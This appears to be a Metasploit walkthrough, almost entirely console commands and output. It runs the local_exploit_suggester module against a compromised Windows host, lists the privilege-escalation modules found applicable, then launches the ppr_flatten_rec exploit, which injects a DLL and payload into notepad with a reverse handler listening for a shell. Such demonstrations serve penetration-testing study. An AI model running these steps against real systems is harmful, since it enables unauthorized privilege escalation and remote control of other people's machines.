metasploit - local_exploit_suggester

msf post(local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          1                yes       The session to run this module on.
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf post(local_exploit_suggester) > run

[*] 192.168.1.102 - Collecting local exploits for x86/windows...
[*] 192.168.1.102 - The following 28 exploit checks are being tried:
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated
[*] 192.168.1.102 - exploit/windows/local/bthpan
[*] 192.168.1.102 - exploit/windows/local/bypassuac
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection
[*] 192.168.1.102 - exploit/windows/local/ikeext_service
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate
[*] 192.168.1.102 - exploit/windows/local/mqac_write
[*] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d
[*] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast
[*] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei
[*] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl
[*] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy
[*] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting
[*] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec
[*] 192.168.1.102 - exploit/windows/local/service_permissions
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions
[*] 192.168.1.102 - exploit/windows/local/adobe_sandbox_adobecollabsync: Cannot reliably check exploitability.
[*] 192.168.1.102 - exploit/windows/local/agnitum_outpost_acs: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/always_install_elevated: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bthpan: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/bypassuac: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/bypassuac_injection: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ipass_launch_app: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/lenovo_systemupdate: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/mqac_write: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms10_015_kitrap0d: The target appears to be vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] 192.168.1.102 - exploit/windows/local/ms11_080_afdjoinleaf: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ms13_005_hwnd_broadcast: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ms13_053_schlamperei: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable.
[+] 192.168.1.102 - exploit/windows/local/ms14_058_track_popup_menu: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms14_070_tcpip_ioctl: The target is not exploitable.
[+] 192.168.1.102 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.1.102 - exploit/windows/local/ms15_051_client_copy_image: The target service is running, but could not be validated.
[*] 192.168.1.102 - exploit/windows/local/ms_ndproxy: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nicm: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/novell_client_nwfs: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/ntapphelpcachecontrol: The target is not exploitable.
[*] 192.168.1.102 - exploit/windows/local/powershell_remoting: This module does not support check.
[+] 192.168.1.102 - exploit/windows/local/ppr_flatten_rec: The target is vulnerable.
[*] 192.168.1.102 - exploit/windows/local/service_permissions: This module does not support check.
[*] 192.168.1.102 - exploit/windows/local/virtual_box_guest_additions: The target is not exploitable.
[*] Post module execution completed
msf post(local_exploit_suggester) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > show options 

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run

[*] Started reverse handler on 192.168.1.108:4444 
[*] Launching notepad to host the exploit...
[+] Process 872 launched.
[*] Reflectively injecting the exploit DLL into 872...
[*] Injecting exploit into 872 ...
[*] Exploit injected. Injecting payload into 872...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 10 sec ...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

References

https://community.rapid7.com/community/metasploit/blog/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值